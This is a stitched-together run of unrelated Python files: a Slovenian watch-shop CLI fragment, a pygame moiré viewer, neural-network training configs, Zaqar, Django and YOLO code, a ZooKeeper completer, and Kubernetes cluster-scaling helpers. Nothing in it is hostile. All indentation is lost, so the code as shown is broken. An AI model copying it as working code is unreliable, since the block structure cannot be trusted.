print(' cena: {}'.format(cena))
print(' kategorija izdelka: {}'.format(kategorija[0]))
def izberi_izdelek():
niz = input('Poiščite svojo uro > ')
idji_izdelkov = modeli.poisci_izdelek(niz)
moznosti = [
'{} ---> {} EUR'.format(opis, cena) for _, opis, cena in modeli.podatki_izdelkov(idji_izdelkov)
]
izbira = izberi_moznost(moznosti)
return None if izbira is None else idji_izdelkov[izbira]
# 3) Naročila
# TODO Implement to the end
#""" def prikazi_podatke_narocil():
# id_narocila = izberi_narocilo()
# if id_narocila is None:
# print('Nobeno narocilo ne ustreza iskalnemu nizu.')
#else:
# id_narocilo, datum, rok_placila, kupec, status, izdelki = modeli.podatki_narocila(id_narocila)
# print(' Stevilka narocila {}'.format(id_narocilo))
# print(' datum: {}'.format(datum))
#print(' rok placila: {}'.format(rok_placila))
#print(' kupec: {}'.format(kupec))
#print(' status placila: {}'.format(status))
#print(' Izdelki:')
#for izdelek in izdelki:
# print("**********************************************")
# print(' Naziv izdelka: {}'.format(izdelek[0])) # Naziv izdelka povlečen
# print(' Cena izdelka: {}'.format(izdelek[1])) # Naziv izdelka povlečen
#print(' Količina izdelka: {}'.format(izdelek[2])) # Naziv izdelka povlečen
#print(' Popust na izdelek: {}%'.format(izdelek[3]*100)) # Naziv izdelka povlečen
#def izberi_narocilo():
#niz = input('Vnesite datum naročila (format: dd/mm/yyyy) > ')
#idji_narocil = modeli.poisci_narocila(niz)
#moznosti = [
# 'številka naročila: {} Kupec: {}'.format(id_narocila, kupec) for id_narocila, kupec in modeli.podatki_narocil(idji_narocil)
#]
#izbira = izberi_moznost(moznosti)
#return None if izbira is None else idji_narocil[izbira]
#"""
def pokazi_moznosti():
print(50 * '-')
izbira = izberi_moznost([
'prikaži podatke kupca',
'prikaži podatke o izdelku',
#'prikaži podatke o narocilu',
# 'dodaj vlogo osebe v filmu',
#'prikaži najboljše filme posameznega desetletja',
#'dodaj film',
'izhod',
])
if izbira == 0:
prikazi_podatke_kupcev()
elif izbira == 1:
prikazi_podatke_izdelkov()
#elif izbira == 2:
# prikazi_podatke_narocil()
# elif izbira == 3:
# prikazi_najboljse_filme_desetletja()
# elif izbira == 4:
# dodaj_film()
else:
print('Nasvidenje!')
exit()
def main():
print('Pozdravljeni v trgovini ur!')
while True:
pokazi_moznosti()
main() |
import pygame
import pygame.freetype
import src.shared_constants as sc
KEYBOARD_MOVE_DISTANCE = 1
KEYBOARD_ROTATE_ANGLE = 0.1
class App:
def __init__(self, patterns, pattern_name):
pygame.init()
self.window = pygame.display.set_mode(sc.WINDOW_SIZE)
pygame.display.set_caption("Moiré")
self.clock = pygame.time.Clock()
pygame.key.set_repeat(500, 17)
self.patterns = patterns
self.pattern_name = pattern_name
self.pattern = self.patterns[pattern_name]()
self.pattern_names = sorted(list(patterns.keys()))
self.pattern_index = self.pattern_names.index(self.pattern_name)
self.pattern.draw(self.window)
self.window_center = pygame.Vector2(self.window.get_rect().center)
self.show_info = True
self.font = pygame.freetype.SysFont(("consolas", "inconsolata", "monospace"), 16)
self.font.fgcolor = pygame.Color((16, 16, 16))
self.font.bgcolor = pygame.Color((220, 220, 220))
self.line_spacing = pygame.Vector2(0, self.font.get_sized_height())
self.text_margin = pygame.Vector2(5, 5)
w, h = sc.WINDOW_SIZE
_, self.info_rect = self.font.render(
f" translation: -{w}, -{h} " # maximum string width
)
self.info_rect.height = self.text_margin.y * 2 + self.line_spacing.y * 3
self.info_rect.topleft = self.text_margin
self.info_surface = pygame.Surface(self.info_rect.size)
self.update_info()
def run(self):
movement_mouse = pygame.Vector2()
movement_keyboard = pygame.Vector2()
rotation_mouse = []
rotation_keyboard = 0
while True:
self.clock.tick(60)
draw_pattern = False
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
return
elif event.key == pygame.K_BACKSPACE:
self.pattern.reset()
draw_pattern = True
elif event.key == pygame.K_F1:
self.show_info = not self.show_info
draw_pattern = True
elif event.key == pygame.K_w:
movement_keyboard.y -= KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_a:
movement_keyboard.x -= KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_s:
movement_keyboard.y += KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_d:
movement_keyboard.x += KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_q:
rotation_keyboard += KEYBOARD_ROTATE_ANGLE
elif event.key == pygame.K_e:
rotation_keyboard -= KEYBOARD_ROTATE_ANGLE
elif event.key == pygame.K_n:
# Switch to next pattern
self.pattern_index = (self.pattern_index + 1) % len(self.pattern_names)
self.pattern_name = self.pattern_names[self.pattern_index]
self.pattern = self.patterns[self.pattern_name]()
draw_pattern = True
elif event.type == pygame.MOUSEMOTION and event.buttons[0]:
movement_mouse += event.rel
elif event.type == pygame.MOUSEMOTION and event.buttons[2]:
rotation_mouse.append(event)
if movement_mouse != (0, 0) or movement_keyboard != (0, 0):
self.pattern.move(movement_mouse + movement_keyboard)
movement_mouse.update(0, 0)
movement_keyboard.update(0, 0)
draw_pattern = True
if rotation_mouse or rotation_keyboard != 0:
self.pattern.rotate(rotation_mouse, rotation_keyboard)
rotation_mouse.clear()
rotation_keyboard = 0
draw_pattern = True
if draw_pattern:
self.pattern.draw(self.window)
self.update_info()
if self.show_info:
self.window.blit(self.info_surface, self.info_rect)
pygame.display.flip()
def update_info(self):
self.info_surface.fill(self.font.bgcolor)
pygame.draw.rect(
self.info_surface,
self.font.fgcolor,
self.info_surface.get_rect(),
1
)
self.font.render_to(
self.info_surface,
self.text_margin,
f"name: {self.pattern_name}"
)
translation = (self.pattern.foreground_center
/ sc.MAGNIFICATION
- self.window_center)
self.font.render_to(
self.info_surface,
self.text_margin + self.line_spacing,
f"translation: {translation.x:.0f}, {translation.y:.0f}"
)
self.font.render_to(
self.info_surface,
self.text_margin + self.line_spacing * 2,
f"angle: {self.pattern.angle:.1f}°"
)
|
config_DMLPDTP2_linear = {
'lr': 8.703567590317672e-06,
'target_stepsize': 0.017250397502053975,
'beta1': 0.99,
'beta2': 0.99,
'epsilon': 1.727973356862063e-08,
'lr_fb': 0.0007959054461775743,
'sigma': 0.09857259200102354,
'feedback_wd': 5.782689838884453e-06,
'beta1_fb': 0.99,
'beta2_fb': 0.9,
'epsilon_fb': 3.1081662356907766e-08,
'out_dir': 'logs/mnist/DMLPDTP2_linear',
'network_type': 'DMLPDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'linear',
'size_mlp_fb': None,
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.],
}
config_BP = {
'lr': 0.000287604813302375,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 4.7253263377092954e-08,
'out_dir': 'logs/fashion_mnist/BP',
'network_type': 'BP',
'initialization': 'xavier_normal',
'target_stepsize': 1.0,
'extra_fb_epochs': 0,
'epochs_fb': 0,
}
config_DTP_improved = {
'lr': 9.182096556021097e-06,
'target_stepsize': 0.038390892689968543,
'feedback_wd': 0.00043410554677483223,
'beta1': 0.99,
'beta2': 0.9,
'epsilon': 5.0647473988637e-08,
'lr_fb': 0.00023284386425380716,
'sigma': 0.2994857084510052,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 2.4338150947778934e-08,
'out_dir': 'logs/fashion_mnist/DTP',
'network_type': 'DTP',
'initialization': 'xavier_normal',
'fb_activation': 'tanh',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,1.],
}
config_DKDTP2 = {
'lr': 3.5732235846702084e-06,
'target_stepsize': 0.015455634153961095,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 1.2701003983026873e-08,
'lr_fb': 6.880092987934033e-06,
'sigma': 0.04388002579623536,
'feedback_wd': 5.558397978753893e-05,
'beta1_fb': 0.999,
'beta2_fb': 0.999,
'epsilon_fb': 0.00015552792707179634,
'out_dir': 'logs/mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.001],
}
config_DFA = {
'lr': 0.0009403014926576205,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 3.661109295012624e-08,
'out_dir': 'logs/fashion_mnist/DFA',
'network_type': 'DFA',
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'target_stepsize': 1.0,
'extra_fb_epochs': 0,
'epochs_fb': 0,
'gn_damping': [10.,1.,1.,10.,1.],
}
config_DTPDR = {
'lr': 7.101735983180753e-05,
'target_stepsize': 0.08656715666379391,
'feedback_wd': 2.138772519002704e-05,
'beta1': 0.99,
'beta2': 0.999,
'epsilon': 1.6407278251505892e-08,
'lr_fb': 9.698300934344597e-05,
'sigma': 0.08433329930575183,
'beta1_fb': 0.99,
'beta2_fb': 0.9,
'epsilon_fb': 2.267582036430733e-05,
'out_dir': 'logs/fashion_mnist/DTPDR_nonseq',
'network_type': 'DTPDR',
'initialization': 'xavier_normal',
'fb_activation': 'tanh',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.01],
}
config_DTP = {
'lr': 6.264712908427562e-05,
'target_stepsize': 0.24133669284943418,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 3.175105564611512e-08,
'lr_fb': 0.00036600402073155754,
'sigma': 0.26748740970595125,
'beta1_fb': 0.99,
'beta2_fb': 0.999,
'epsilon_fb': 1.3606678094184999e-06,
'out_dir': 'logs/fashion_mnist/DTP',
'network_type': 'DTP',
'initialization': 'xavier_normal',
'feedback_wd': 0,
'fb_activation': 'tanh',
'extra_fb_epochs': 0,
'epochs_fb': 0,
'gn_damping': [10.,10.,10.,10.,10.],
}
config_DKDTP2_extrafb = {
'lr': 3.171519855395423e-05,
'target_stepsize': 0.05598874122443612,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 2.0138675396073716e-08,
'lr_fb': 1.578529455711729e-05,
'sigma': 0.0862694472920603,
'feedback_wd': 0.000766250333918441,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 5.246940731788602e-07,
'out_dir': 'logs/fashion_mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 4,
'epochs_fb': 10,
'gn_damping': [1.,1.,1.,1.,0.001],
}
config_DKDTP2_rec_extrafb = {
'lr': 6.3790630374119055e-06,
'target_stepsize': 0.08410816705027833,
'beta1': 0.9,
'beta2': 0.9,
'epsilon': 1.0627279807937555e-08,
'lr_fb': 5.275331141492459e-05,
'sigma': 0.06531861405669062,
'feedback_wd': 0.00017016700163704547,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 4.87297459975216e-07,
'out_dir': 'logs/fashion_mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': True,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 4,
'epochs_fb': 10,
'gn_damping': [0.1,0.1,0.1,0.1,0.0001],
}
config_DDTPControl = {
'lr': 3.0076918366526155e-05,
'target_stepsize': 0.032346424994794266,
'beta1': 0.9,
'beta2': 0.999,
'epsilon': 1.3274012105519261e-08,
'lr_fb': 3.12062953559089e-05,
'sigma': 0.08486912067649759,
'feedback_wd': 1.1893046560968361e-06,
'beta1_fb': 0.999,
'beta2_fb': 0.99,
'epsilon_fb': 0.00032568051410950655,
'out_dir': 'logs/fashion_mnist/DDTPControl',
'network_type': 'DDTPControl',
'recurrent_input': False,
'hidden_fb_activation': 'linear',
'size_mlp_fb': None,
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [10.,1.,1.,10.,10.],
}
config_collection = {
'DTPDRL': config_DTPDR,
'DDTP-linear': config_DMLPDTP2_linear,
'DDTP-RHL': config_DKDTP2,
'DDTP-RHL(extra fb)': config_DKDTP2_extrafb,
'DDTP-RHL(rec+extra fb)': config_DKDTP2_rec_extrafb,
'DTP': config_DTP,
'DTP (pretrained)': config_DTP_improved,
'DDTP-control': config_DDTPControl,
'DFA': config_DFA,
'BP': config_BP,
}
result_keys = [
'loss_train',
'loss_test',
'loss_val',
'acc_train',
'acc_test',
'acc_val',
'bp_angles',
'gnt_angles',
'rec_loss',
]
config_fixed = {
'dataset': 'fashion_mnist',
'optimizer': 'Adam',
'optimizer_fb': 'Adam',
'momentum': 0.0,
'parallel': True,
'normalize_lr': True,
'batch_size': 128,
'forward_wd': 0.0,
'not_randomized': True,
'not_randomized_fb': True,
'extra_fb_minibatches': 0,
'epochs': 100,
'train_only_feedback_parameters': False,
'num_hidden': 5,
'size_hidden': 256,
'size_input': 784,
'size_output': 10,
'hidden_activation': 'tanh',
'output_activation': 'softmax',
'no_bias': False,
'no_cuda': False,
'random_seed': 42,
'cuda_deterministic': False,
'freeze_BPlayers': False,
'multiple_hpsearch': False,
'save_logs': True,
'save_BP_angle': True,
'save_GN_angle': False,
'save_GNT_angle': True,
'save_GN_activations_angle': False,
'save_BP_activations_angle': False,
'hpsearch': False,
'plots': 'compute',
'log_interval': 80,
}
if __name__ == '__main__':
pass |
# Copyright (c) 2013 Rackspace, Inc.
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from zaqar.common import decorators
class Request(object):
"""General data for a Zaqar request
Transport will generate a request object and send to this the API to be
processed.
:param action: Action to identify the API call being processed,
i.e: 'get_queues', 'get_messages'
:type action: str
:param body: Request's body. Default: None
:type body: str
:param headers: Request headers. Default: None
:type headers: dict
:param api: Api entry point. i.e: 'queues.v1'
:type api: `six.text_type`.
"""
def __init__(self, action,
body=None, headers=None, api=None):
self._action = action
self._body = body
self._headers = headers or {}
self._api = api
@decorators.lazy_property()
def deserialized_content(self):
if self._body is not None:
return json.loads(self._body)
return None
def get_request(self):
return {'action': self._action,
'body': self._body,
'headers': self._headers,
'api': self._api}
|
from django.shortcuts import render
from .models import City
from django.views.generic import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .forms import CityForm
from django.urls import reverse_lazy
from django.core.paginator import Paginator
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
# Create your views here.
def home(request):
# if request.method == 'POST':
# form = CityForm(request.POST or None)
# if form .is_valid():
# print(form.cleaned_data)
# form = CityForm()
# cities = City.objects.all()
cities = City.objects.all()
paginator = Paginator(cities, 25)
page = request.GET.get("page")
cities = paginator.get_page(page)
return render(request, "cities/home.html", {"objects_list": cities})
# return render(request, 'cities/home.html',
# {'objects_list': cities, 'form': form})
class CityDetailView(DetailView):
queryset = City.objects.all()
context_object_name = "object"
template_name = "cities/detail.html"
class CityCreateView(SuccessMessageMixin, CreateView):
model = City
form_class = CityForm
template_name = "cities/create.html"
success_url = reverse_lazy("city:home")
success_message = "City successfully created!"
class CityUpdateView(SuccessMessageMixin, UpdateView):
model = City
form_class = CityForm
template_name = "cities/update.html"
success_url = reverse_lazy("city:home")
success_message = "City successfully updated!"
class CityDeleteView(DeleteView):
model = City
# template_name = 'cities/delete.html'
success_url = reverse_lazy("city:home")
def get(self, request, *args, **kwargs):
messages.success(request, "City successfully deleted!")
return self.post(request, *args, **kwargs)
|
import json
import logging
import os
from lib_yolo import yolov3, train, utils
def main():
config = {
'training': True, # edit
'resume_training': False, # edit
'resume_checkpoint': 'last', # edit: either filename or 'last' the resume a training
'priors': yolov3.ECP_9_PRIORS, # edit if not ECP dataset
'run_id': 'yolo',
'checkpoint_path': './checkpoints',
'tensorboard_path': './tensorboard',
'log_path': './log',
'ckp_max_to_keep': 102,
'checkpoint_interval': 5000,
'ign_thresh': 0.7,
'crop_img_size': [768, 1440, 3],
'full_img_size': [1024, 1920, 3], # edit if not ECP dataset
'train_steps': 500000,
'darknet53_weights': './darknet53.conv.74',
'batch_size': 8, # edit
'lr': 1e-5,
'cpu_thread_cnt': 24, # edit
'crop': True, # edit, random crops and rescaling reduces memory consumption and improves training
'freeze_darknet53': True, # if True the basenet weights are frozen during training
'aleatoric_loss': False,
'cls_cnt': 2, # edit if not ECP dataset
'implicit_background_class': True, # whether the label ids start at 1 or 0. True = 1, False = 0
'train': {
'file_pattern': os.path.expandvars('$HOME/data/ecp/tfrecords/ecp-day-train-*-of-*'), # edit
'num_shards': 20,
'shuffle_buffer_size': 2000,
'cache': False, # edit if you have enough memory, caches whole dataset in memory
},
'val': {
'file_pattern': os.path.expandvars('$HOME/data/ecp/tfrecords/ecp-day-val-*-of-*'), # edit
'num_shards': 4,
'shuffle_buffer_size': 10,
'cache': False, # edit if you have enough memory, caches whole dataset in memory
}
}
# Note regarding implicit background class:
# The tensorflow object detection API enforces that the class labels start with 1.
# The class 0 is reserved for an (implicit) background class. We support both file formats.
utils.add_file_logging(config, override_existing=True)
logging.info(json.dumps(config, indent=4, default=lambda x: str(x)))
model_cls = yolov3.yolov3
if config['training']:
train.start(model_cls, config)
else:
config['thresh'] = 0.01 # filter out boxes with objectness score less than thresh
utils.qualitative_eval(model_cls, config)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='%(asctime)s, %(levelname)-8s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
)
main()
|
import kazoo
from prompt_toolkit.completion import Completer, Completion
from .lexer import KEYWORDS, ZK_FOUR_LETTER_WORDS
class ZkCompleter(Completer):
def __init__(self, zkcli, *args, **kwargs):
super().__init__(*args, **kwargs)
self.zkcli = zkcli
self.command = None
self.prev_typed_word = None
self.cache = {}
def _completions(self, complete_from, word_before_cursor):
completions = [cmd for cmd in complete_from if cmd.startswith(word_before_cursor)]
for completion in completions:
yield Completion(completion, -len(word_before_cursor))
def get_completions(self, document, complete_event):
"""The completions are either commands or paths"""
word_before_cursor = document.get_word_before_cursor(WORD=True)
# If command has been typed, store it
if (
not self.command and
self.prev_typed_word in KEYWORDS and
word_before_cursor == ''
):
self.command = document.text.strip()
# Find all possible completable commands
self.prev_typed_word = word_before_cursor
if self.command is None:
yield from self._completions(KEYWORDS, word_before_cursor)
elif self.command == "raw":
yield from self._completions(ZK_FOUR_LETTER_WORDS, word_before_cursor)
else:
# Autocomplete on the path of available znodes
path = word_before_cursor
if path.startswith('/'):
current_chroot = '/'.join(path.split('/')[:-1]).rstrip('/') or '/'
current_node = path.replace(current_chroot, '').lstrip('/')
if current_chroot not in self.cache:
try:
self.cache[current_chroot] = self.zkcli.get_children(current_chroot)
except kazoo.exceptions.NoNodeError:
# We may be typing a nonexistent path
# (for example with the 'create' command)
self.cache[current_chroot] = []
completions = [
'/%s' % (node)
for node in self.cache[current_chroot]
if node.startswith(current_node)
]
for completion in completions:
yield Completion(completion, -(len(current_node) + 1))
|
"""
deploy cluster service to kubernetes via the API server
"""
import base64
from datetime import datetime, timedelta
import getpass
import logging
import os
import random
import re
import socket
import string
import subprocess as sp
import sys
import urllib3
from pkg_resources import resource_filename, Requirement
from netaddr import valid_ipv4
from kubernetes import client as k8sclient
from kubernetes.stream import stream
from kubernetes.client import api_client
from kubernetes.client.configuration import Configuration
from kubernetes.client.rest import ApiException
from kubernetes.config import kube_config
from kubernetes.utils import create_from_yaml
import yaml
from koris.ssl import read_cert
from koris.ssl import discovery_hash as ssl_discovery_hash
from koris.util.util import retry
from koris.util.logger import Logger
from koris import MASTER_LISTENER_NAME
if getattr(sys, 'frozen', False):
MANIFESTSPATH = os.path.join(
sys._MEIPASS, # pylint: disable=no-member, protected-access
'deploy/manifests')
else:
MANIFESTSPATH = resource_filename(Requirement.parse("koris"),
'koris/deploy/manifests')
LOGGER = Logger(__name__)
ETCDCTL_BASE = ("ETCDCTL_API=3 etcdctl "
"--key /etc/kubernetes/pki/etcd/server.key "
"--cacert /etc/kubernetes/pki/etcd/ca.crt "
"--cert /etc/kubernetes/pki/etcd/server.crt "
"{} --endpoints=https://{}:2379 -w json")
def _get_node_addr(addresses, addr_type):
"""
Parse the address of the node
Args:
addresses (object) - instance of addresses returned from k8s API
addr_type (str) - the address type
"""
return [i.address for i in addresses if i.type == addr_type][0]
def rand_string(num):
"""
generate a random string of len num
"""
return ''.join([
random.choice(string.ascii_letters.lower() + string.digits)
for n in range(num)])
def get_token_description():
"""create a description for the token"""
description = "Bootstrap token generated by 'koris add' from {} on {}"
return description.format('%s@%s' % (getpass.getuser(), socket.gethostname()),
datetime.now())
def parse_etcd_response(resp):
"""Takes a response from etcdctl and parses it for its member info.
The response is to be expected in JSON format as obtained by
``etcdctl member list -w json``. Right now, the IDs in the JSON
response are in uint64 format and will be transformed into hex
with this function.
Args:
resp (str): A JSON response from etcdctl.
Returns:
A dict containing member information.
Raises:
ValueError if state could not be extracted.
"""
if not resp or resp is None:
raise ValueError("etcdtl response is empty")
if not re.search("master-\\d+", resp):
LOGGER.debug(resp)
raise ValueError("can't find 'master' in etcdtl response")
# Reconstructing the response so we get a dict where the key is the
# member name and and value is a dict with the other info.
out = {}
resp_yaml = yaml.load(resp)
for mem in resp_yaml['members']:
if 'name' in mem:
out[mem['name']] = {k: v for k, v in mem.items() if k != "name"}
# ID is uint64, but we need it in hex
out[mem['name']]['ID'] = hex(out[mem['name']]['ID'])[2:]
return out
class K8SConfigurator: # pylint: disable=no-member
"""apply plugins and post install setup"""
def apply_plugins(self, plugins):
"""apply all plugins in the list"""
def get_bootstrap_token(self):
"""Generate a Bootstrap token
Returns:
A string of the form ``<token id>.<token secret>``.
"""
tid = rand_string(6)
token_secret = rand_string(16)
data = {'description': get_token_description(),
'token-id': tid,
'token-secret': token_secret,
'expiration':
datetime.strftime(datetime.now() + timedelta(hours=2),
"%Y-%m-%dT%H:%M:%SZ"),
'usage-bootstrap-authentication': 'true',
'usage-bootstrap-signing': 'true',
'auth-extra-groups':
'system:bootstrappers:kubeadm:default-node-token', }
for k, val in data.items():
data[k] = base64.b64encode(val.encode()).decode()
sec = k8sclient.V1Secret(data=data)
sec.metadata = k8sclient.V1ObjectMeta(
**{'name': 'bootstrap-token-%s' % tid, 'namespace': 'kube-system'})
sec.type = 'bootstrap.kubernetes.io/token'
self.api.create_namespaced_secret(namespace="kube-system", body=sec)
return ".".join((tid, token_secret))
@property
def host(self):
"""Retrieve the host or loadbalancer info"""
return self.api.api_client.configuration.host
@property
def ca_info(self):
"""Return a dict with the read ca and the discovery hash"""
return {"ca_cert": self.ca_cert, "discovery_hash": self.discovery_hash}
@property
def ca_cert(self):
"""Returns the API servers CA.
Returns:
The CA encoded as base64.
"""
return read_cert(self.api.api_client.configuration.ssl_ca_cert)
@property
def discovery_hash(self):
"""Calculate and return a discovery_hash.
Based on the cluster CA.
Returns:
A discovery hash encoded in Hex.
"""
return ssl_discovery_hash(self.ca_cert)
@property
def is_ready(self):
"""Check if the API server is already available.
Returns:
True if it's reachable.
"""
logging.getLogger("urllib3").setLevel(logging.ERROR)
try:
k8sclient.apis.core_api.CoreApi().get_api_versions()
logging.getLogger("urllib3").setLevel(logging.WARNING)
return True
except urllib3.exceptions.MaxRetryError:
logging.getLogger("urllib3").setLevel(logging.WARNING)
return False
def get_random_master(self):
"""Returns a name and IP of a random master server in the cluster.
Returns:
Tuple of name and IP of a master.
"""
nodes = self.api.list_node(pretty=True)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
addresses = nodes[0].status.addresses
# master_ip and master_name are the hostname and IP of an existing
# master, where an etcd instance is already running.
master_ip = _get_node_addr(addresses, "InternalIP")
master_name = _get_node_addr(addresses, "Hostname")
return master_name, master_ip
@retry(ValueError)
def etcd_cluster_status(self):
"""Checks the current etcd cluster state.
This function calls etcdctl inside a pod in order to obtain the
current state of the etcd cluster before a new member can be added
to it.
Right now, etcdctl offers no convenient way to format the output so
the URLs from the masters can be extracted, which is why jq is used here.
Args:
podname (str): The name of the pod where the etcdctl command
should be sent from. Needs to be inside the kube-system namespace.
master_ip (str)
Returns:
The status of the etcd as a string
(e.g.master-1=192.168.1.102,master-2=192.168.1.103)
"""
name, master_ip = self.get_random_master()
exec_command = ['/bin/sh', '-c', ETCDCTL_BASE.format(
"member list", master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
"etcd-%s" % name, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
if not response or not re.search("master-\\d+", response):
LOGGER.info(response)
raise ValueError("Could not extract current etcd cluster state!")
# respone should be something like
# {'members': [{'ID': 9007573287841766007, 'name': 'master-7-am',
# 'peerURLs': ['https://10.32.192.11:2380'],
# 'clientURLs': ['https://10.32.192.11:2379']}]}
response = yaml.load(response)
etcd_cluster = ",".join(("=".join((m['name'], m['peerURLs'][0])) for m
in response['members'] if 'name' in m))
LOGGER.debug("Current etcd cluster state is: %s", etcd_cluster)
return etcd_cluster
def add_all_masters_to_loadbalancer(self, cluster_name, n_masters, lb_inst):
"""Adds all master nodes to the LoadBalancer listener.
If the number of members in the master listener pool of the LoadBalancer
is less than expected number of masters this function will add them to
the pool as soon as they have node status "Ready".
Args:
cluster_name (string): the name of the cluster
n_master (int): Number of desired master nodes.
lb_inst (:class:`.cloud.openstack.LoadBalancer`):
A configured LoadBalancer instance.
"""
cond = {'Ready': 'True'}
master_listener = lb_inst.master_listener
listener_name = '-'.join((MASTER_LISTENER_NAME,
cluster_name))
if not master_listener:
LOGGER.error(f"No {listener_name} found, aborting")
sys.exit(1)
try:
listener_name = master_listener['name']
mem = master_listener['pool']['members'] # noqa # pylint: disable=unused-variable
pool_id = master_listener['pool']['id']
except KeyError as exc:
LOGGER.error(f"Unable to extract info of {listener_name}: {exc}")
sys.exit(1)
while len(lb_inst.master_listener['pool']['members']) < n_masters:
for item in self.api.list_node(pretty=True).items:
if cond in [{c.type: c.status} for c in item.status.conditions]:
if 'master' in item.metadata.name:
addr_to_add = item.status.addresses[0].address
addr_present = [x['address'] for x in
lb_inst.master_listener['pool']['members']]
if addr_to_add not in addr_present:
LOGGER.debug("Adding %s to pool '%s' (%s) ...", addr_to_add,
listener_name, pool_id)
lb_inst.add_member(pool_id,
addr_to_add)
def apply_addons(self, koris_config, apply_func=create_from_yaml):
"""apply all addons to the cluster
Args:
koris_config (dict): koris configuration loaded as dict
"""
for addon in get_addons(koris_config):
LOGGER.info("Applying add-on [%s]", addon.name)
addon.apply(self.client, apply_func=apply_func)
@property
def nginx_ingress_ports(self):
"""
get the ingress-nginx service ports as dictionary
"""
ingress = self.api.list_namespaced_service(
'ingress-nginx',
label_selector="app.kubernetes.io/name=ingress-nginx",
limit=1)
return {i.name.upper(): i for i in ingress.items[0].spec.ports}
def validate_context(self, conn):
"""Validate that server that we are talking to via K8S API
is also the cloud context we are using.
This retrieves the project ID of the Kubernetes LoadBalancer,
then checks if it finds the same ID in any LoadBalancer of the
currently sourced OpenStack project.
In case the IP is not a Floating IP but only a Virtual IP, both
IPs are simply compared.
Args:
conn (obj): OpenStack connection object.
Return:
bool
"""
raw_ip = self.host.strip("https://").split(":")[0]
lb_ip = conn.network.find_ip(raw_ip)
if lb_ip:
# We have a Floating IP
for item in conn.load_balancer.load_balancers():
if item.project_id == lb_ip.project_id:
return True
else:
# We have a Virtual IP
for item in conn.load_balancer.load_balancers():
if item.vip_address == raw_ip:
return True
return False
class K8SScaler: # pylint: disable=no-member
"""
A Mixin to modify the cluster size
"""
def add_node(self):
"""add a node to the cluster"""
def add_master(self):
"""add a master to the cluster"""
def drain_node(self, nodename, ignore_not_found=True):
"""Drains a node of pods.
We're using ``kubectl drain`` instead of the eviction API, since it's
quicker and we don't have to get all the Pods of the Node first.
Will check if the node exists first.
Args:
nodename (str): Name of the node to drain
ignore_not_found (bool): If set to False, will raise
a ValueError if the node doesn't exist.
Raises:
RuntimeError if ``kubectl drain`` fails.
"""
if self.node_status(nodename) is None:
msg = f"Node {nodename} doesn't exist"
if ignore_not_found:
LOGGER.info("Skipping node eviction, %s", msg)
return
raise ValueError(msg)
# kubectl drain needs to block
cmd = ["kubectl", "drain", nodename, "--ignore-daemonsets"]
try:
proc = sp.run(cmd,
check=True,
encoding="utf-8",
stdout=sp.PIPE,
stderr=sp.PIPE)
except sp.CalledProcessError as exc:
raise RuntimeError("error calling '%s':"
"%s" % " ".join(cmd), exc)
LOGGER.debug("STDOUT: %s (Exit code %s)", proc.stdout,
proc.returncode)
# pylint: disable=too-many-function-args
def delete_node(self, nodename, grace_period=0, ignore_not_found=True):
"""Delete a node in Kubernetes.
Args:
nodename (str): The name of the node to delete.
grace_period (int): Duration in seconds before the node should be
delete. Defaults to 0, which means immediately.
ignore_not_found (bool): If set to False, will raise a ValueError if
node doesn't exist.
Raises:
:class:`kubernetes.client.rest.ApiException` in case the API call
fails.
"""
if self.node_status(nodename) is None:
msg = f"Node {nodename} doesn't exist"
if ignore_not_found:
LOGGER.info("Skipping node eviction, %s", msg)
return
raise ValueError(msg)
resp = self.api.delete_node(nodename, grace_period_seconds=grace_period,
pretty=True)
LOGGER.debug(resp)
LOGGER.success("Kubernetes node '%s' has been deleted successfully",
nodename)
